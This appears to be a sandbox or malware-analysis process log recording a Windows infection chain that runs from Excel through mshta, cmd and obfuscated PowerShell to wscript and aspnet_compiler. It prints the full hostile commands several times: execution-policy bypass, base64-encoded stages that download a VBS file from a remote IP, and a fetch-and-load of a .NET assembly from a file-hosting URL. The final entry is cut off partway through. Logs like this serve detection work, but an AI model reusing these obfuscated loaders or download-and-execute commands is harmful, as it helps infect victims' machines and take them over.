              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernardaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia